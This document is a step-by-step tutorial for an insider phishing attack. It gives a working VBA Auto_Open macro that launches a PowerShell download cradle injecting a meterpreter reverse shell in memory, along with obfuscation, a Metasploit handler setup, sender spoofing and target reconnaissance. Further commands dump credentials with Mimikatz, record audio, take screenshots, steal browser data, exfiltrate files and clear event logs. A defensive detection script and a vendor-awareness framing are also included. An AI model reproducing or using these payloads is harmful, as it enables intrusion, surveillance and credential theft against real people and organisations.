Technical Guide for Insider Cyber Attacks
Danger can be at home
Attack Description
Possible Attack scenarios:
- Insider employee who wants to exfiltrate business data in order to resell it
- Competitor who wants to make another company look bad
- Consultant who wants to sneak into the corporate network for malicious purposes
- …for the glory
Attack scope:
- Open a reverse shell on a target machine, bypassing standard anti-malware solutions with in-memory PowerShell scripts
- In-memory PowerShell remote command execution
- Dump credentials, take screenshots, record audio, etc…
Possible Attack vectors:
- Targeted phishing email that delivers a malicious document with an embedded macro
- Rubber Ducky with a predefined autorun PowerShell script
- File exchange between the insider and a victim colleague
- Any other method that executes code on the victim's machine…
In this article I will use a phishing email as the example.
STEP 1: Code writing
Create the CMD command string to execute on the target PC:
- powershell.exe → run PowerShell on the victim machine (works with plain user privileges too)
- IEX (New-Object Net.WebClient) → IEX is Invoke-Expression: it executes the string that follows as PowerShell code. New-Object Net.WebClient creates a .NET WebClient, which picks up the system proxy settings, so the download goes out the same way the user's browser would
- .DownloadString('https://HOSTING_SITE/Shellcode.ps1'); → download the PS script from the remote host as a string (nothing is written to disk)
- Invoke-Shellcode → PowerSploit function that injects the payload's stager shellcode into the running PowerShell process, directly in memory, in order to bypass the AV solutions
- -Payload windows/meterpreter/reverse_https → set the payload that you want to use
- -Lhost x.x.x.x → set the attacker machine's IP
- -Lport 443 → set the port the victim machine will contact the attacker on. Use 443 because outbound HTTPS is almost always allowed by the internal firewall
- -Force → skip the confirmation prompt ("I know what I'm doing, and I'm sure I want to do this")
During this attack demonstration I downloaded the script directly from the PowerSploit GitHub repository, because a download from raw.githubusercontent.com blends in with legitimate traffic and is less likely to be flagged on the network (you can also host the script directly on your Kali Linux machine so the communication never has to leave the internal network). The complete command that will be executed on the victim machine is the following (note that the file really is named Invoke--Shellcode.ps1, with a double dash, in that commit of the repository):
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force"
STEP 2: Malicious Macro Code writing
In this step you need to wrap the previous command in a VBA macro inside an Excel document:
- Sub Auto_Open() → the macro runs automatically when the workbook is opened (once the user has enabled macros)
- Call Shell("cmd.exe → run a local CMD
- /c powershell.exe → tell CMD to launch PowerShell
- -noexit → keep the PowerShell process alive after the command returns; the injected meterpreter thread lives inside this process, so if PowerShell exited the session would die with it
- "IEX (New-Object…" → the command built in STEP 1. Its double quotes are doubled ("") because the whole thing sits inside a VBA string literal
- vbHide → run the command with a hidden window
- End Sub → end of the macro
So the complete VBA macro that you need to insert into the Excel file is the following:
Sub Auto_Open()
    Call Shell("cmd.exe /c powershell.exe -noexit ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force""", vbHide)
End Sub
An example of the malicious excel:


Virus Total Detection at day 0:

Hybrid-analysis:
Any.Run Interactive Malware Analysis:
Although this sample has a trivial structure and the code plainly shows its malicious behaviour, the detection ratio at day 0 is very low. This highlights the first real security problem: vendors that rely only on signatures for their detection have nothing to match against until a sample has been seen and catalogued.
STEP 3: Simple Code Obfuscation (OPTIONAL)
You can encode the command text in simple ways. PowerShell's -EncodedCommand switch takes the Base64 of the UTF-16LE (what .NET calls "Unicode") bytes of the command, not UTF-8, so the script below uses that encoding:
$command = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force"
# -EncodedCommand expects Base64 of the UTF-16LE bytes
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$encodedCommand >> output.txt

Example of encoded command to execute:
powershell -ExecutionPolicy Bypass -encodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAB[…]=

You can also protect the VBA project with a password in order to slow down a first, superficial investigation. Note that the password only stops the VBA editor from showing the source: static tools such as olevba read the macro straight out of the OLE streams of the document, so this buys nothing against a proper analysis.

STEP 4: Configure KALI Linux
Because this is an insider attack you can run a live Kali Linux or install it in a VM. The goal is to run the code on the victim machine without leaving traces that point back to the attacking machine, so choose whichever method you prefer.
I suggest using a preconfigured Kali Linux virtual machine that you can delete as soon as the job is done.
These are the msfconsole configuration steps for the handler:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
exploit



Remember that the low-detection result holds only for exactly this configuration. If you add handler options such as set InitialAutoRunScript "migrate -f" (automatic process migration on session open) or other post scripts, the AVs may detect them.
STEP 5: OSINT Reconnaissance (OPTIONAL)
If you already know everything about your target you can skip this step.
In other cases, such as a phishing attack, you will have to find the most suitable victim to receive the email, or simply learn something more about the target.
In this example I show how you can use a public tool named hunter.io for the reconnaissance phase. On GitHub and elsewhere on the internet there are many different tools that can help you in this phase.
Example Hunter.io results for the Kaspersky domain:



Link of the tool: https://hunter.io/search
STEP 6: Send Malicious Email via fake online mailer
In order to send the malicious email without configuring a mail server and exposing yourself unnecessarily, I suggest using an online fake mailer. There are many options on the internet; here are some examples:

Depending on the mailer used, the anti-spam services (based on sender reputation or other indicators) will either block the email or let it through. I advise doing some tests before proceeding in order to find the ideal mailer for your target.
Link to the best-known fake mailer: https://emkei.cz/
Creating the phishing email:

STEP 7: Victim receives the email
How the email renders in Outlook on the web:

STEP 8: Waiting
At this point you just have to wait until:
- the user clicks on "Enable Content"
- the macro runs the malicious code silently
- the session opens on the handler
Here we are:

STEP 9: Actions on objective
Below you can find some examples of malicious commands executed on Windows machines. Over the last few days I had the opportunity to test different enterprise and home antivirus solutions which, with one exception, failed miserably to detect and block the following types of in-memory attacks.
The same tests were then repeated with the ATP (advanced threat protection) and EDR (endpoint detection and response) components of the various enterprise solutions. Thanks to these integrations it was possible to detect or block all, or at least some, of the described attacks: they look at process lineage and at what PowerShell actually executes, not at a file hash.
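The Base64 obfuscation of STEP 3 and the EDR observation above come down to the same check: a process-creation event (Sysmon Event ID 1, or Windows 4688 with command-line auditing enabled) whose command line, once any -EncodedCommand argument has been decoded, contains a download cradle plus a PowerSploit call, spawned under an Office parent. The Python below is an added example of that detection logic; it is not code from the original article, from PowerSploit or from any EDR product. The events it scans are constructed here to mirror the page's own command lines (the x.x.x.x placeholders are kept), and the field names image, parent_image and command_line are assumptions standing in for the Sysmon Image, ParentImage and CommandLine fields. encode_command reproduces the STEP 3 encoding, so its output starts with the same SQBFAFgA… prefix shown on the page.

```python
"""Detect the macro -> cmd -> powershell -> in-memory PowerSploit chain in process-creation events.

Added example: the events below are constructed to mirror the article's command lines; they are
not real telemetry, and the field names are assumptions for Sysmon's Image/ParentImage/CommandLine.
"""
import base64
import binascii
import ntpath
import re

# The command string the article builds in STEP 1 (Lhost/Lport placeholders kept as on the page).
STAGE1_COMMAND = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/"
    "2153a0a0b05ce5cdacceefeefe46b30f20caf3db/CodeExecution/Invoke--Shellcode.ps1'); "
    "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force"
)


def encode_command(command: str) -> str:
    """Base64 of the UTF-16LE bytes: the encoding powershell.exe -EncodedCommand expects (STEP 3)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (Sysmon Event ID 1 / 4688 style), not real telemetry.
SAMPLE_EVENTS = [
    {   # STEP 2 macro chain: EXCEL.EXE -> cmd.exe /c powershell.exe -noexit "..."
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "command_line": f'cmd.exe /c powershell.exe -noexit "{STAGE1_COMMAND}"',
    },
    {   # STEP 3 obfuscated variant: cmd.exe -> powershell.exe -encodedCommand <base64>
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": f"powershell -ExecutionPolicy Bypass -encodedCommand {encode_command(STAGE1_COMMAND)}",
    },
    {   # benign admin activity
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    },
    {   # benign Office child: Excel opening a hyperlink in the default browser
        "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "command_line": '"C:\\Program Files\\Mozilla Firefox\\firefox.exe" https://example.com/report',
    },
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, -encoded, ...).
ENCODED_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}
FLAG_RE = re.compile(r"[-/](\w+)\s+([A-Za-z0-9+/=]+)")

# Content indicators, evaluated on the command line after any encoded payload has been decoded.
INDICATORS = {
    "download_cradle": re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "execution_policy_bypass": re.compile(r"-e[px]\w*\s+bypass", re.I),
    "powersploit_module": re.compile(
        r"invoke-shellcode|invoke-mimikatz|get-timedscreenshot|get-microphoneaudio|invoke-wcmdump|get-browserdata",
        re.I),
    "meterpreter_payload": re.compile(r"meterpreter", re.I),
}


def decode_encoded_command(command_line: str):
    """Return the plaintext behind a -EncodedCommand (or prefix) argument, or None if there is none."""
    for match in FLAG_RE.finditer(command_line):
        flag, value = match.group(1).lower(), match.group(2)
        if flag not in ENCODED_FLAGS:
            continue
        try:
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # looked like the flag but the value is not a UTF-16LE Base64 blob
    return None


def expand(command_line: str) -> str:
    """Command line with the decoded payload appended, so the content indicators can see it."""
    decoded = decode_encoded_command(command_line)
    return command_line if decoded is None else f"{command_line} {decoded}"


def match_indicators(event: dict) -> list:
    """Names of the indicators one event trips; an empty list means nothing suspicious."""
    hits = []
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent_image"]).lower()
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")  # lineage: Office should not be launching a shell
    expanded = expand(event["command_line"])
    if expanded != event["command_line"]:
        hits.append("encoded_command")
    hits.extend(name for name, pattern in INDICATORS.items() if pattern.search(expanded))
    return hits


def triage(events) -> list:
    """Indices of events tripping two or more indicators. A single hit (a download cradle in a
    legitimate install script, say) is noise; the combination is the macro-to-meterpreter chain."""
    return [i for i, event in enumerate(events) if len(match_indicators(event)) >= 2]


if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, match_indicators(SAMPLE_EVENTS[i]))
```

Sysmon records only the direct parent, so the powershell.exe event from the macro shows cmd.exe as its parent and the Office lineage is visible on the cmd.exe event; in a real pipeline the two are joined on ParentProcessGuid. This example keys the second hop on the command-line content instead, which is exactly the part that signature-only AV never inspects.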
Write me if you need more details…
…Let’s start with the attacks:
Obtain a Windows shell:

Take screenshots at a regular interval and save them to disk using an in-memory PowerShell script:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-TimedScreenshot.ps1'); Get-TimedScreenshot -Path c:\windows\temp\ -Interval 30 -EndTime 18:00"
The screenshots saved in the specified folder:

Record audio from the microphone using the Windows API and save the output to a file on disk (the alias is passed unquoted so that it does not clash with the double quotes around the whole command):
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-MicrophoneAudio.ps1'); Get-MicrophoneAudio -Path c:\windows\temp\secret.wav -Length 10 -Alias SECRET"


Dump credentials using in-memory PowerShell scripts
Invoke-Mimikatz loads the standard Mimikatz tool reflectively and dumps credentials without ever writing the Mimikatz binary to disk:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Mimikatz needs administrative privileges on the victim machine, because reading LSASS memory requires SeDebugPrivilege. If you don't want to use a privilege escalation mechanism you can use other scripts that run as the logged-on user, such as:
Invoke-WCMDump: PowerShell script to dump the current user's saved Windows credentials from the Credential Manager
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1'); Invoke-WCMDump"

Get browser data
Enumerates browser history and bookmarks for Chrome, Internet Explorer and/or Firefox on Windows machines:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Get-BrowserData.ps1'); Get-BrowserData"

Data exfiltration — download files
After executing the malicious commands and saving their outputs on the victim filesystem, you can download them with a single command directly from meterpreter:
meterpreter > download <file name>
Using this method it is possible to pull sensitive data such as business documents or personal information off the victim machine.
STEP 10: Erase the traces
There are many tricks for deleting the tracks of this activity. Here is a simple list:
- The clearev meterpreter command clears the Application, System and Security logs on the Windows system. Be aware that the wipe itself is logged: clearing the Security log writes event 1102 (audit log cleared) and clearing the System or Application log writes event 104, so any log forwarding to a SIEM still records that a wipe happened
- Disconnect the Kali Linux machine
- Save the output files on an encrypted USB drive
- Delete the VM image from disk
- Wipe the physical disk
Conclusion
PowerShell allows attackers to perform malicious actions without deploying any additional binary, increasing the chances of spreading their threats further without being detected. The fact that PowerShell is installed by default makes the framework a favoured attack tool.
With these attacks I showed you how simple it is to compromise a machine and bypass the standard security measures that are normally used in large companies. I hope this demonstration can help security vendors increase their detection capabilities, and help companies realise that the "standard" security solutions used to date are not enough to detect these attacks.
Could next-generation AVs be the solution? It is certainly an option that must be evaluated!